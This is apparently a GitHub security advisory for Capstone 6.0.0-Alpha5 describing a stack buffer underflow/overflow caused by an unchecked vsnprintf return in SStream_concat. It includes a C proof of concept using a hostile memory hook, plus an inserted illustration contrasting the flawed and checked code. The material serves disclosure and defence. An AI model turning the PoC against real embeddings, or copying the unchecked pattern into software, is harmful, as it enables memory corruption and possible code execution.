
Unchecked vsnprintf return in SStream_concat allows stack buffer underflow&overflow

Moderate
Rot127 published GHSA-85f5-6xr3-q76r Dec 17, 2025

Package

No package listed

Affected versions

6.0.0-Alpha5

Patched versions

None

Description

Summary

Unchecked vsnprintf return in SStream_concat lets a malicious cs_opt_mem.vsnprintf drive SStream’s index negative or past the end, leading to a stack
buffer underflow/overflow when the next write occurs.

Details

  • Vulnerable path: SStream_concat adds ret from cs_vsnprintf directly to ss->index without validating that it is non-negative and within remaining buffer
    space (SStream.c:227-244). A negative return underflows index; an oversized return skips overflow checks.
  • Subsequent writes in SStream_concat1 use the corrupted index, writing before or beyond ss->buffer (stack-allocated), corrupting stack memory.
  • The vsnprintf hook is attacker-controlled via cs_option(CS_OPT_MEM) (include/capstone/capstone.h:280-290, cs.c:1037). Any embedding that allows
    untrusted code to install a custom cs_opt_mem can be exploited.
  • Affected build tested: git describe → 6.0.0-Alpha5-34-g9a0a1607 (Capstone 6.0.0 build).
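To make the two failure modes above concrete, here is an added example that is not Capstone's own code: a minimal model of the SStream_concat pattern the advisory describes, with the unchecked `ss->index += ret` update beside a checked form that rejects negative returns and clamps on truncation. Every name in it (ss_t, SS_BUFSZ, g_vsnprintf, hook_negative, hook_oversized, drive) and the 64-byte buffer size are invented for the illustration; the hooks are modelled on the PoC's vsnprintf that returns -1, plus the over-reporting case the Details mention.

```c
/* Added example, not Capstone's own code: a minimal model of the
 * SStream_concat pattern from the advisory, with the unchecked update of
 * ss->index beside a checked form. All names here (ss_t, SS_BUFSZ,
 * g_vsnprintf, hook_*) are invented for the illustration. */
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SS_BUFSZ 64            /* hypothetical size; Capstone's buffer is larger */

typedef int (*vsnprintf_t)(char *, size_t, const char *, va_list);

typedef struct {
    char buffer[SS_BUFSZ];     /* stack-allocated, as in the real SStream */
    int index;
} ss_t;

/* Stand-in for the cs_opt_mem.vsnprintf hook installed via CS_OPT_MEM. */
static vsnprintf_t g_vsnprintf = vsnprintf;

/* Vulnerable pattern: ret is added to index without any validation. */
static void ss_concat_unchecked(ss_t *ss, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int ret = g_vsnprintf(ss->buffer + ss->index,
                          (size_t)(SS_BUFSZ - ss->index), fmt, ap);
    va_end(ap);
    ss->index += ret;   /* ret < 0: index goes negative; ret huge: index past end */
}

/* Checked form: reject negative returns, clamp on truncation or a lying hook.
 * Returns 0 on success, -1 when output was rejected; index never leaves
 * [0, SS_BUFSZ - 1], so a later single-character append cannot escape. */
static int ss_concat_checked(ss_t *ss, const char *fmt, ...)
{
    if (ss->index < 0 || ss->index >= SS_BUFSZ)
        return -1;
    size_t remaining = (size_t)(SS_BUFSZ - ss->index);
    va_list ap;
    va_start(ap, fmt);
    int ret = g_vsnprintf(ss->buffer + ss->index, remaining, fmt, ap);
    va_end(ap);
    if (ret < 0)
        return -1;                        /* hook reported an error */
    if ((size_t)ret >= remaining) {       /* truncated, or hook over-reports */
        ss->index = SS_BUFSZ - 1;
        ss->buffer[ss->index] = '\0';
        return -1;
    }
    ss->index += ret;
    return 0;
}

/* Misbehaving hooks modelled on the PoC: one returns -1, one over-reports. */
static int hook_negative(char *s, size_t n, const char *f, va_list ap)
{
    (void)s; (void)n; (void)f; (void)ap;
    return -1;
}
static int hook_oversized(char *s, size_t n, const char *f, va_list ap)
{
    (void)f; (void)ap;
    if (n) s[0] = '\0';
    return 1 << 20;                       /* far beyond any remaining space */
}

/* Run one append through either variant and report the resulting index.
 * The buffer is never written again afterwards, so a corrupted index is
 * only observed here, not dereferenced. */
static int drive(vsnprintf_t hook, int checked, int *rc_out)
{
    ss_t ss;
    memset(&ss, 0, sizeof ss);
    int rc = 0;
    g_vsnprintf = hook;
    if (checked)
        rc = ss_concat_checked(&ss, "%s", "AAAA");
    else
        ss_concat_unchecked(&ss, "%s", "AAAA");
    g_vsnprintf = vsnprintf;
    if (rc_out)
        *rc_out = rc;
    return ss.index;
}

static int unchecked_index(vsnprintf_t hook) { return drive(hook, 0, NULL); }
static int checked_index(vsnprintf_t hook)   { return drive(hook, 1, NULL); }
static int checked_rc(vsnprintf_t hook)      { int rc; drive(hook, 1, &rc); return rc; }

int main(void)
{
    printf("unchecked, ret=-1:    index=%d\n", unchecked_index(hook_negative));
    printf("unchecked, ret=1<<20: index=%d\n", unchecked_index(hook_oversized));
    printf("checked,   ret=-1:    index=%d rc=%d\n",
           checked_index(hook_negative), checked_rc(hook_negative));
    printf("checked,   ret=1<<20: index=%d rc=%d\n",
           checked_index(hook_oversized), checked_rc(hook_oversized));
    printf("checked,   libc:      index=%d rc=%d\n",
           checked_index(vsnprintf), checked_rc(vsnprintf));
    return 0;
}
```

With the unchecked variant the index ends at -1 or 1<<20 after a single append, which is exactly the state in which the advisory's next write (SStream_concat1) lands outside the stack buffer. The checked variant treats a negative return as an error and any return at or beyond the remaining space as truncation, so the index stays inside the buffer regardless of what the hook reports.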

PoC

Reproduces stack buffer overflow with AddressSanitizer on macOS (AppleClang 17):

Build ASan-instrumented library

cmake -B build-asan -DCMAKE_BUILD_TYPE=Debug \
  -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
cmake --build build-asan -j4

PoC (uses custom vsnprintf returning -1)

  cat > poc_sstream.c <<'EOF'
  // PoC: install a cs_opt_mem whose vsnprintf always returns -1, then drive
  // the internal SStream API directly. SStream.h is an internal header in the
  // repository root (not part of the installed public headers), which is why
  // the PoC is built from the source tree against the static library.
  #include <capstone/capstone.h>
  #include <stdarg.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include "SStream.h"

  static int evil_vsnprintf(char *str, size_t size, const char *fmt, va_list ap)
  {
      (void)str; (void)size; (void)fmt; (void)ap;
      return -1; // forces index underflow: SStream_concat does ss->index += ret
  }

  int main(void)
  {
      // CS_OPT_MEM is set on handle 0 before any cs_open(); the hooks are
      // library-global, not per-handle.
      cs_opt_mem mem = { .malloc = malloc, .calloc = calloc, .realloc = realloc,
                         .free = free, .vsnprintf = evil_vsnprintf };
      cs_option(0, CS_OPT_MEM, (size_t)&mem);

      SStream ss;
      SStream_Init(&ss);
      SStream_concat(&ss, "%s", "AAAA"); // index += -1
      SStream_concat1(&ss, 'B');         // writes before buffer => crash/ASan hit
      return 0;
  }
  EOF

clang -fsanitize=address -Iinclude poc_sstream.c build-asan/libcapstone.a -o poc_sstream
ASAN_OPTIONS=halt_on_error=0:abort_on_error=0 ./poc_sstream

ASan reports stack-buffer-overflow in SStream_concat1.

Impact

  • Vulnerability: Stack buffer underflow/overflow leading to memory corruption and potential code execution in the process using Capstone.
  • Who is impacted: Applications that let untrusted plugins/scripts set cs_option(CS_OPT_MEM) (or otherwise control cs_vsnprintf) while using SStream (all
    printers). Not reachable by mere untrusted input alone; requires the ability to set Capstone’s memory hooks.

Severity

Moderate


CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

CVE ID

CVE-2025-68114

Weaknesses

No CWEs

Credits